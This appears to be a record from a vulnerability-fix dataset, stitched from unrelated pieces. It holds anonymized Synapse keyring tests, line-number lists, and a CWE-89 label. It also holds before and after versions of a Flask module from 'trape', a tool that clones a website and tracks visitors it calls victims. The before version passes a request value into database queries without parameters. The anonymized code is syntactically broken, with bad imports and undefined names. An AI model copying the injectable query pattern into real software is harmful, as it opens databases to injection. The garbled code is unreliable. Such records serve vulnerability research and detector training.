VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], VAR_34)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
VAR_16["server_name"] = "OTHER_SERVER"
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertEqual(VAR_42, {})
class CLASS_3(unittest.HomeserverTestCase):
def FUNC_12(self, VAR_10, VAR_11):
self.mock_perspective_server = CLASS_0()
self.http_client = Mock()
VAR_46 = self.default_config()
VAR_46["trusted_key_servers"] = [
{
"server_name": self.mock_perspective_server.server_name,
"verify_keys": self.mock_perspective_server.get_verify_keys(),
}
]
return self.setup_test_homeserver(http_client=self.http_client, VAR_46=config)
def FUNC_14(
self, VAR_5: str, VAR_12: SigningKey, VAR_13: int,
) -> dict:
VAR_6 = signedjson.key.get_verify_key(VAR_12)
VAR_47 = "%s:%s" % (VAR_6.alg, VAR_6.version)
VAR_16 = {
"server_name": VAR_5,
"old_verify_keys": {},
"valid_until_ts": VAR_13,
"verify_keys": {
VAR_47: {
"key": signedjson.key.encode_verify_key_base64(VAR_6)
}
},
}
signedjson.sign.sign_json(VAR_16, VAR_5, VAR_12)
self.mock_perspective_server.sign_response(VAR_16)
return VAR_16
def FUNC_15(
self, VAR_14: str, VAR_15: str, VAR_16: dict
) -> None:
async def FUNC_28(VAR_40, VAR_41, VAR_48, **VAR_3):
self.assertEqual(VAR_40, self.mock_perspective_server.server_name)
self.assertEqual(VAR_41, "/_matrix/VAR_0/v2/query")
VAR_51 = VAR_48["server_keys"]
self.assertEqual(list(VAR_51[VAR_14].keys()), [VAR_15])
return {"server_keys": [VAR_16]}
self.http_client.post_json.side_effect = FUNC_28
def FUNC_16(self):
self.reactor.advance(100)
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_34 = "server2"
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = self.build_perspectives_response(
VAR_34, VAR_36, VAR_39,
)
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertIn(VAR_34, VAR_42)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
def FUNC_17(self):
self.reactor.advance(100)
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_34 = self.mock_perspective_server.server_name
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = self.build_perspectives_response(
VAR_34, VAR_36, VAR_39
)
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertIn(VAR_34, VAR_42)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
def FUNC_18(self):
self.reactor.advance(100)
VAR_34 = "server2"
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
def FUNC_29():
return self.build_perspectives_response(
VAR_34, VAR_36, VAR_39
)
def FUNC_30(VAR_16):
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_23 = {VAR_34: {"key1": 0}}
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
return self.get_success(VAR_35.get_keys(VAR_23))
VAR_16 = FUNC_29()
VAR_42 = FUNC_30(VAR_16)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.verify_key, VAR_37)
VAR_16 = FUNC_29()
del VAR_16["signatures"][self.mock_perspective_server.server_name]
VAR_42 = FUNC_30(VAR_16)
self.assertEqual(VAR_42, {}, "Expected empty dict with missing persp server sig")
VAR_16 = FUNC_29()
del VAR_16["signatures"][VAR_34]
VAR_42 = FUNC_30(VAR_16)
self.assertEqual(VAR_42, {}, "Expected empty dict with missing origin server sig")
def FUNC_0(VAR_0):
return "%s:%s" % (VAR_0.alg, VAR_0.version)
@defer.inlineCallbacks
def FUNC_1(VAR_1, *VAR_2, **VAR_3):
with LoggingContext("testctx") as ctx:
ctx.request = "testctx"
VAR_49 = yield VAR_1(*VAR_2, **VAR_3)
return VAR_49
def FUNC_2(VAR_4, *VAR_2):
@defer.inlineCallbacks
def FUNC_19():
VAR_50 = yield VAR_4.verify_json_for_server(*VAR_2)
return VAR_50
return FUNC_1(FUNC_19)
|
import time
from mock import Mock
import canonicaljson
import signedjson.key
import signedjson.sign
from nacl.signing import SigningKey
from signedjson.key import .encode_verify_key_base64, get_verify_key
from twisted.internet import .defer
from twisted.internet.defer import Deferred, ensureDeferred
from synapse.api.errors import SynapseError
from synapse.crypto import .keyring
from synapse.crypto.keyring import (
PerspectivesKeyFetcher,
ServerKeyFetcher,
StoreKeyFetcher,
)
from synapse.logging.context import (
LoggingContext,
current_context,
make_deferred_yieldable,
)
from synapse.storage.keys import FetchKeyResult
from tests import unittest
from tests.test_utils import make_awaitable
from tests.unittest import logcontext_clean
class CLASS_0:
def __init__(self):
self.server_name = "mock_server"
self.key = signedjson.key.generate_signing_key(0)
def FUNC_3(self):
VAR_17 = signedjson.key.get_verify_key(self.key)
return {"%s:%s" % (VAR_17.alg, VAR_17.version): encode_verify_key_base64(VAR_17)}
def FUNC_4(self, VAR_5, VAR_6):
VAR_18 = "%s:%s" % (VAR_6.alg, VAR_6.version)
VAR_7 = {
"server_name": VAR_5,
"old_verify_keys": {},
"valid_until_ts": time.time() * 1000 + 3600,
"verify_keys": {VAR_18: {"key": encode_verify_key_base64(VAR_6)}},
}
self.sign_response(VAR_7)
return VAR_7
def FUNC_5(self, VAR_7):
signedjson.sign.sign_json(VAR_7, self.server_name, self.key)
@logcontext_clean
class CLASS_1(unittest.HomeserverTestCase):
def FUNC_6(self, VAR_8, VAR_9):
self.assertEquals(getattr(current_context(), "request", None), VAR_9)
return VAR_8
def FUNC_7(self):
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock()
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_19,))
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server10", VAR_20)
VAR_22 = Deferred()
async def FUNC_20(VAR_23):
self.assertEquals(current_context().request, "context_11")
self.assertEqual(VAR_23, {"server10": {FUNC_0(VAR_20): 0}})
await make_deferred_yieldable(VAR_22)
return {
"server10": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 100)
}
}
VAR_19.get_keys.side_effect = FUNC_20
async def FUNC_21():
with LoggingContext("context_11") as context_11:
context_11.request = "context_11"
VAR_52 = VAR_4.verify_json_objects_for_server(
[("server10", VAR_21, 0, "test10"), ("server11", {}, 0, "test11")]
)
self.assertTrue(VAR_52[1].called)
try:
await VAR_52[1]
self.assertFalse("unsigned json didn't cause a failure")
except SynapseError:
pass
self.assertFalse(VAR_52[0].called)
VAR_52[0].addBoth(self.check_context, None)
await make_deferred_yieldable(VAR_52[0])
VAR_24 = ensureDeferred(FUNC_21())
VAR_19.get_keys.assert_called_once()
async def FUNC_22(VAR_23):
self.assertEquals(current_context().request, "context_12")
return {
"server10": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 100)
}
}
VAR_19.get_keys.reset_mock()
VAR_19.get_keys.side_effect = FUNC_22
VAR_25 = [0]
async def FUNC_23():
with LoggingContext("context_12") as context_12:
context_12.request = "context_12"
VAR_53 = VAR_4.verify_json_objects_for_server(
[("server10", VAR_21, 0, "test")]
)
VAR_53[0].addBoth(self.check_context, None)
VAR_25[0] = 1
await make_deferred_yieldable(VAR_53[0])
VAR_25[0] = 2
VAR_26 = ensureDeferred(FUNC_23())
self.pump()
self.assertEqual(VAR_25[0], 1)
VAR_19.get_keys.assert_not_called()
VAR_22.callback(None)
self.get_success(VAR_24)
self.get_success(VAR_26)
def FUNC_8(self):
VAR_4 = keyring.Keyring(self.hs)
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_27 = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", FUNC_0(VAR_20), FetchKeyResult(get_verify_key(VAR_20), 1000))],
)
self.get_success(VAR_27)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server9", VAR_20)
VAR_28 = FUNC_2(VAR_4, "server9", {}, 0, "test unsigned")
self.get_failure(VAR_28, SynapseError)
VAR_28 = FUNC_2(VAR_4, "server9", VAR_21, 500, "test signed")
self.get_success(VAR_28)
def FUNC_9(self):
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock(return_value=make_awaitable({}))
VAR_4 = keyring.Keyring(
self.hs, key_fetchers=(StoreKeyFetcher(self.hs), VAR_19)
)
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_27 = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", FUNC_0(VAR_20), FetchKeyResult(get_verify_key(VAR_20), None))],
)
self.get_success(VAR_27)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server9", VAR_20)
VAR_28 = FUNC_2(VAR_4, "server9", {}, 0, "test unsigned")
self.get_failure(VAR_28, SynapseError)
VAR_28 = FUNC_2(
VAR_4, "server9", VAR_21, 500, "test signed non-zero min"
)
self.get_failure(VAR_28, SynapseError)
VAR_19.get_keys.assert_called_once_with(
{"server9": {FUNC_0(VAR_20): 500}}
)
VAR_28 = FUNC_2(
VAR_4, "server9", VAR_21, 0, "test signed with zero min"
)
self.get_success(VAR_28)
def FUNC_10(self):
VAR_20 = signedjson.key.generate_signing_key(1)
async def FUNC_24(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 1200)
}
}
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock(side_effect=FUNC_24)
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_19,))
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server1", VAR_20)
VAR_29 = VAR_4.verify_json_objects_for_server(
[("server1", VAR_21, 500, "test1"), ("server1", VAR_21, 1500, "test2")]
)
self.assertEqual(len(VAR_29), 2)
self.get_success(VAR_29[0])
VAR_30 = self.get_failure(VAR_29[1], SynapseError).value
self.assertEqual(VAR_30.errcode, "M_UNAUTHORIZED")
self.assertEqual(VAR_30.code, 401)
VAR_19.get_keys.assert_called_once()
def FUNC_11(self):
VAR_20 = signedjson.key.generate_signing_key(1)
async def FUNC_25(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 800)}
}
async def FUNC_26(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 1200)
}
}
VAR_31 = keyring.KeyFetcher()
VAR_31.get_keys = Mock(side_effect=FUNC_25)
VAR_32 = keyring.KeyFetcher()
VAR_32.get_keys = Mock(side_effect=FUNC_26)
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_31, VAR_32))
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server1", VAR_20)
VAR_29 = VAR_4.verify_json_objects_for_server(
[("server1", VAR_21, 1200, "test1"), ("server1", VAR_21, 1500, "test2")]
)
self.assertEqual(len(VAR_29), 2)
self.get_success(VAR_29[0])
VAR_30 = self.get_failure(VAR_29[1], SynapseError).value
self.assertEqual(VAR_30.errcode, "M_UNAUTHORIZED")
self.assertEqual(VAR_30.code, 401)
VAR_31.get_keys.assert_called_once()
VAR_32.get_keys.assert_called_once()
@logcontext_clean
class CLASS_2(unittest.HomeserverTestCase):
def FUNC_12(self, VAR_10, VAR_11):
self.http_client = Mock()
VAR_33 = self.setup_test_homeserver(federation_http_client=self.http_client)
return VAR_33
def FUNC_13(self):
self.reactor.advance(100)
VAR_34 = "server2"
VAR_35 = ServerKeyFetcher(self.hs)
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = {
"server_name": VAR_34,
"old_verify_keys": {},
"valid_until_ts": VAR_39,
"verify_keys": {
VAR_38: {
"key": signedjson.key.encode_verify_key_base64(VAR_37)
}
},
}
signedjson.sign.sign_json(VAR_16, VAR_34, VAR_36)
async def FUNC_27(VAR_40, VAR_41, **VAR_3):
self.assertEqual(VAR_40, VAR_34)
self.assertEqual(VAR_41, "/_matrix/VAR_0/v2/server/key1")
return VAR_16
self.http_client.get_json.side_effect = FUNC_27
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], VAR_34)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
VAR_16["server_name"] = "OTHER_SERVER"
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertEqual(VAR_42, {})
class CLASS_3(unittest.HomeserverTestCase):
def FUNC_12(self, VAR_10, VAR_11):
self.mock_perspective_server = CLASS_0()
self.http_client = Mock()
VAR_46 = self.default_config()
VAR_46["trusted_key_servers"] = [
{
"server_name": self.mock_perspective_server.server_name,
"verify_keys": self.mock_perspective_server.get_verify_keys(),
}
]
return self.setup_test_homeserver(
federation_http_client=self.http_client, VAR_46=config
)
def FUNC_14(
self, VAR_5: str, VAR_12: SigningKey, VAR_13: int,
) -> dict:
VAR_6 = signedjson.key.get_verify_key(VAR_12)
VAR_47 = "%s:%s" % (VAR_6.alg, VAR_6.version)
VAR_16 = {
"server_name": VAR_5,
"old_verify_keys": {},
"valid_until_ts": VAR_13,
"verify_keys": {
VAR_47: {
"key": signedjson.key.encode_verify_key_base64(VAR_6)
}
},
}
signedjson.sign.sign_json(VAR_16, VAR_5, VAR_12)
self.mock_perspective_server.sign_response(VAR_16)
return VAR_16
def FUNC_15(
self, VAR_14: str, VAR_15: str, VAR_16: dict
) -> None:
async def FUNC_28(VAR_40, VAR_41, VAR_48, **VAR_3):
self.assertEqual(VAR_40, self.mock_perspective_server.server_name)
self.assertEqual(VAR_41, "/_matrix/VAR_0/v2/query")
VAR_51 = VAR_48["server_keys"]
self.assertEqual(list(VAR_51[VAR_14].keys()), [VAR_15])
return {"server_keys": [VAR_16]}
self.http_client.post_json.side_effect = FUNC_28
def FUNC_16(self):
self.reactor.advance(100)
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_34 = "server2"
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = self.build_perspectives_response(
VAR_34, VAR_36, VAR_39,
)
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertIn(VAR_34, VAR_42)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
def FUNC_17(self):
self.reactor.advance(100)
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_34 = self.mock_perspective_server.server_name
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = self.build_perspectives_response(
VAR_34, VAR_36, VAR_39
)
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
VAR_23 = {VAR_34: {"key1": 0}}
VAR_42 = self.get_success(VAR_35.get_keys(VAR_23))
self.assertIn(VAR_34, VAR_42)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.valid_until_ts, VAR_39)
self.assertEqual(VAR_43.verify_key, VAR_37)
self.assertEqual(VAR_43.verify_key.alg, "ed25519")
self.assertEqual(VAR_43.verify_key.version, "ver1")
VAR_44 = (VAR_34, VAR_38, None)
VAR_45 = self.get_success(
self.hs.get_datastore().get_server_keys_json([VAR_44])
)
VAR_7 = VAR_45[VAR_44]
self.assertEqual(len(VAR_7), 1)
VAR_7 = res[0]
self.assertEqual(VAR_7["key_id"], VAR_38)
self.assertEqual(VAR_7["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(VAR_7["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(VAR_7["ts_valid_until_ms"], VAR_39)
self.assertEqual(
bytes(VAR_7["key_json"]), canonicaljson.encode_canonical_json(VAR_16)
)
def FUNC_18(self):
self.reactor.advance(100)
VAR_34 = "server2"
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
def FUNC_29():
return self.build_perspectives_response(
VAR_34, VAR_36, VAR_39
)
def FUNC_30(VAR_16):
VAR_35 = PerspectivesKeyFetcher(self.hs)
VAR_23 = {VAR_34: {"key1": 0}}
self.expect_outgoing_key_query(VAR_34, "key1", VAR_16)
return self.get_success(VAR_35.get_keys(VAR_23))
VAR_16 = FUNC_29()
VAR_42 = FUNC_30(VAR_16)
VAR_43 = VAR_42[VAR_34][VAR_38]
self.assertEqual(VAR_43.verify_key, VAR_37)
VAR_16 = FUNC_29()
del VAR_16["signatures"][self.mock_perspective_server.server_name]
VAR_42 = FUNC_30(VAR_16)
self.assertEqual(VAR_42, {}, "Expected empty dict with missing persp server sig")
VAR_16 = FUNC_29()
del VAR_16["signatures"][VAR_34]
VAR_42 = FUNC_30(VAR_16)
self.assertEqual(VAR_42, {}, "Expected empty dict with missing origin server sig")
def FUNC_0(VAR_0):
return "%s:%s" % (VAR_0.alg, VAR_0.version)
@defer.inlineCallbacks
def FUNC_1(VAR_1, *VAR_2, **VAR_3):
with LoggingContext("testctx") as ctx:
ctx.request = "testctx"
VAR_49 = yield VAR_1(*VAR_2, **VAR_3)
return VAR_49
def FUNC_2(VAR_4, *VAR_2):
@defer.inlineCallbacks
def FUNC_19():
VAR_50 = yield VAR_4.verify_json_for_server(*VAR_2)
return VAR_50
return FUNC_1(FUNC_19)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
16,
18,
24,
27,
41,
45,
46,
51,
55,
66,
69,
70,
76,
81,
82,
86,
87,
88,
90,
94,
101,
103,
107,
111,
112,
119,
122,
124,
126,
128,
129,
130,
131,
139,
143,
147,
155,
157,
159,
160,
163,
164,
166,
167,
170,
173,
181,
184,
185,
188,
189,
191,
193,
200,
204,
212,
215,
216,
219,
220,
221,
226,
227,
231,
232,
237,
241,
243,
245,
251,
255,
258,
259,
260,
269,
270,
272,
276,
282,
290,
296,
299,
308,
309,
312,
313,
320,
322,
324,
331,
332,
344,
349,
351,
359,
360,
372,
373,
377,
378,
380,
383,
384,
389,
397,
399,
408,
419,
420,
424,
431,
435,
436,
440,
442,
444,
446,
448,
454,
458,
460,
469,
470,
482,
486,
489,
493,
494,
496,
498,
504,
508,
510,
519,
520,
532,
536,
539,
541,
547,
552,
558,
559,
564,
565,
570,
571,
576,
577,
581,
582,
586,
587,
591,
592,
597,
602,
604,
579,
594,
595,
596,
195,
196,
197,
239,
274,
403,
404,
405,
428,
429,
430,
488,
489,
490,
491,
492,
538
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
16,
18,
24,
27,
41,
45,
46,
51,
55,
66,
69,
70,
76,
81,
82,
86,
87,
88,
90,
94,
101,
103,
107,
111,
112,
119,
122,
124,
126,
128,
129,
130,
131,
139,
143,
147,
155,
157,
159,
160,
163,
164,
166,
167,
170,
173,
181,
184,
185,
188,
189,
191,
193,
200,
204,
212,
215,
216,
219,
220,
221,
226,
227,
231,
232,
237,
241,
243,
245,
251,
255,
258,
259,
260,
269,
270,
272,
276,
282,
290,
296,
299,
308,
309,
312,
313,
320,
322,
324,
331,
332,
344,
349,
351,
359,
360,
372,
373,
377,
378,
380,
383,
384,
389,
397,
401,
410,
421,
422,
426,
433,
437,
438,
442,
444,
446,
448,
450,
456,
460,
462,
471,
472,
484,
488,
491,
495,
496,
498,
500,
506,
510,
512,
521,
522,
534,
538,
541,
543,
549,
554,
560,
561,
566,
567,
572,
573,
578,
579,
583,
584,
588,
589,
593,
594,
599,
604,
606,
581,
596,
597,
598,
195,
196,
197,
239,
274,
405,
406,
407,
430,
431,
432,
490,
491,
492,
493,
494,
540
] |
2CWE-89
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/boxug/trape
#
# Copyright 2017 by boxug / <hey@boxug.com>
#**
import urllib2
from flask import Flask, render_template, session, request, json
from core.trape import Trape
from core.db import Database
# Main parts, to generate relationships among others
trape = Trape()
app = Flask(__name__, template_folder='../templates', static_folder='../static')
# call database
db = Database()
# preview header tool in console
trape.header()
@app.route("/" + trape.stats_path)
def index():
return render_template("/login.html")
@app.route("/logout")
def logout():
return render_template("/login.html")
@app.route("/login", methods=["POST"])
def login():
id = request.form['id']
if id == trape.stats_key:
return json.dumps({'status':'OK', 'path' : trape.home_path, 'victim_path' : trape.victim_path, 'url_to_clone' : trape.url_to_clone, 'app_port' : trape.app_port, 'date_start' : trape.date_start, 'user_ip' : '127.0.0.1'});
else:
return json.dumps({'status':'NOPE', 'path' : '/'});
@app.route("/get_data", methods=["POST"])
def home_get_dat():
d = db.sentences_stats('get_data')
n = db.sentences_stats('all_networks')
('clean_online')
rows = db.sentences_stats('get_clicks')
c = rows[0][0]
rows = db.sentences_stats('get_sessions')
s = rows[0][0]
rows = db.sentences_stats('get_online')
o = rows[0][0]
return json.dumps({'status' : 'OK', 'd' : d, 'n' : n, 'c' : c, 's' : s, 'o' : o});
@app.route("/get_preview", methods=["POST"])
def home_get_preview():
vId = request.form['vId']
d = db.sentences_stats('get_preview', vId)
n = db.sentences_stats('id_networks', vId)
return json.dumps({'status' : 'OK', 'vId' : vId, 'd' : d, 'n' : n});
@app.route("/get_title", methods=["POST"])
def home_get_title():
opener = urllib2.build_opener()
html = opener.open(trape.url_to_clone).read()
html = html[html.find('<title>') + 7 : html.find('</title>')]
return json.dumps({'status' : 'OK', 'title' : html});
@app.route("/get_requests", methods=["POST"])
def home_get_requests():
d = db.sentences_stats('get_requests')
return json.dumps({'status' : 'OK', 'd' : d}); | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/boxug/trape
#
# Copyright 2017 by boxug / <hey@boxug.com>
#**
import urllib2
from flask import Flask, render_template, session, request, json
from core.trape import Trape
from core.db import Database
# Main parts, to generate relationships among others
trape = Trape()
app = Flask(__name__, template_folder='../templates', static_folder='../static')
# call database
db = Database()
# preview header tool in console
trape.header()
@app.route("/" + trape.stats_path)
def index():
return render_template("/login.html")
@app.route("/logout")
def logout():
return render_template("/login.html")
@app.route("/login", methods=["POST"])
def login():
id = request.form['id']
if id == trape.stats_key:
return json.dumps({'status':'OK', 'path' : trape.home_path, 'victim_path' : trape.victim_path, 'url_to_clone' : trape.url_to_clone, 'app_port' : trape.app_port, 'date_start' : trape.date_start, 'user_ip' : '127.0.0.1'});
else:
return json.dumps({'status':'NOPE', 'path' : '/'});
@app.route("/get_data", methods=["POST"])
def home_get_dat():
d = db.sentences_stats('get_data')
n = db.sentences_stats('all_networks')
rows = db.sentences_stats('get_clicks')
c = rows[0][0]
rows = db.sentences_stats('get_sessions')
s = rows[0][0]
vId = ('online', )
rows = db.sentences_stats('get_online', vId)
o = rows[0][0]
return json.dumps({'status' : 'OK', 'd' : d, 'n' : n, 'c' : c, 's' : s, 'o' : o});
@app.route("/get_preview", methods=["POST"])
def home_get_preview():
vId = request.form['vId']
t = (vId,)
d = db.sentences_stats('get_preview', t)
n = db.sentences_stats('id_networks', t)
return json.dumps({'status' : 'OK', 'vId' : vId, 'd' : d, 'n' : n});
@app.route("/get_title", methods=["POST"])
def home_get_title():
opener = urllib2.build_opener()
html = opener.open(trape.url_to_clone).read()
html = html[html.find('<title>') + 7 : html.find('</title>')]
return json.dumps({'status' : 'OK', 'title' : html});
@app.route("/get_requests", methods=["POST"])
def home_get_requests():
d = db.sentences_stats('get_requests')
return json.dumps({'status' : 'OK', 'd' : d}); | sql | {
"code": [
" ('clean_online')",
" rows = db.sentences_stats('get_online')",
" d = db.sentences_stats('get_preview', vId)",
" n = db.sentences_stats('id_networks', vId)"
],
"line_no": [
50,
55,
63,
64
]
} | {
"code": [
" vId = ('online', )",
" rows = db.sentences_stats('get_online', vId)",
" t = (vId,)",
" d = db.sentences_stats('get_preview', t)",
" n = db.sentences_stats('id_networks', t)"
],
"line_no": [
54,
55,
63,
64,
65
]
} |
import urllib2
from flask import Flask, render_template, session, request, json
from core.trape import Trape
from core.db import Database
VAR_0 = Trape()
VAR_1 = Flask(__name__, template_folder='../templates', static_folder='../static')
VAR_2 = Database()
VAR_0.header()
@VAR_1.route("/" + VAR_0.stats_path)
def FUNC_0():
return render_template("/FUNC_2.html")
@VAR_1.route("/logout")
def FUNC_1():
return render_template("/FUNC_2.html")
@VAR_1.route("/login", methods=["POST"])
def FUNC_2():
VAR_3 = request.form['id']
if VAR_3 == VAR_0.stats_key:
